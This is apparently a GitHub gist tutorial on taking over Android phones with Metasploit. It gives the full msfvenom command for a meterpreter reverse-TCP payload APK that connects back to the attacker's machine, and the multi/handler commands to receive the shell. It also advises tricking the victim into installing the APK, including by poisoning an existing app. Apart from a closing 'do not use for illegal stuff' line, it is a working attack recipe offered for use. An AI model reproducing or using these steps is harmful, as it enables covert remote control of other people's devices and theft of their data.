Skip to content

Instantly share code, notes, and snippets.

@fadhilsaheer
Last active December 28, 2022 09:46
Show Gist options
  • Save fadhilsaheer/01b86f7a7d8ea394ae99308cc8bee891 to your computer and use it in GitHub Desktop.
Save fadhilsaheer/01b86f7a7d8ea394ae99308cc8bee891 to your computer and use it in GitHub Desktop.
Hack android devices using METASPLOIT πŸ‘¨β€πŸ’»

HACK ANDROID πŸ“±

H4ck Android using METASPLOIT πŸ±β€πŸ’»

HACK THE WORLD 🌎 LEGALLY OF COURSE πŸ‘©β€βš–οΈ


I assume you have a decent linux distro for hacking

I recommend Parrot OS or Kali

or at least Metasploit πŸ±β€πŸ’»


  • Attacker and victim must be on same network
  • Victim should download the apk file

If everything is ready lets rock n roll πŸ“


How does this works ?? πŸ€·β€β™‚οΈ

We will generate a PAYLOAD apk that will make a METERPRETER REVERSE SHELL to attackers computer

We are using basic Msfvenom payload

you could poison an existing mobile app to trick victim

Steps πŸ›£

  • generate a apk payload
  • start a listener
  • victim download and execute it
  • boom we are done πŸ’₯

Generate payload πŸ›

Generating payload is pretty easy task using Msfvenom 🀘

Make sure you have msfvenom by typing msfvenom -h in your terminal

if it is ready you are good to go

LHOST = Your IP address [ type ifconfig in your terminal ]

LPORT = Any port [ eg: 4444, 5555, 6666 etc .. ]

msfvenom -p android/meterpreter/reverse_tcp LHOST=<YOUR_IP> LPORT=<ANY_PORT> R > payload.apk 

In the above command we are using android/meterpreter/reverse_tcp as our payload, because Meterpreter provides us lots of command, which makes hacking so easy


Listen for connection πŸ‘‚

Listener should be running when victim install the app

Fire up METASPLOIT πŸ±β€πŸ’»

use exploit/multi/handler

msf6 > use exploit/multi/handler

fill up the options, you can see all options by typing show options

we need to set LHOST LPORT & PAYLOAD

set PAYLOAD android/meterpreter/reverse_tcp
set LHOST <IP_USED_ON_PAYLOAD>
set LPORT <PORT_USED_ON_PAYLOAD>

run the exploit

run

Now listener will start, wait until victim install the app πŸ‘¨β€πŸ’»


If victim install the app, you should get a Meterpreter shell back CONGRATULATIONS, YOU HACKED IN TO AN ANDROID DEVICE πŸŽ‰

If you found this post boring here is the video explanation

❗DO NOT USE THIS FOR ILLEGAL STUFF❗

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment